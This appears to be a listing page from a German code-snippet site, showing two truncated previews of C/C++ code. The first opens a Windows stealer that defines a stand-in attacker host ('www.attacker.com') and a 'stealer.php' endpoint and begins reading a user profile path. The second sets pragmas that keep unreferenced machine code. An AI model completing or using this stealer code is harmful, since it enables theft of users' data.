[cpp]#include <Windows.h> #include <WinInet.h> #define HOST "www.attacker.com" #define PORT 80 #define PAGE_NAME "stealer.php" char * getProfilePath() { DWORD... weiterlesen...
[php] #pragma comment(linker, "/OPT:NOREF") // this tells the linker to keep the machine code of unreferenced source code #pragma optimize("", off) // disable all optimiz... weiterlesen...
Kommentare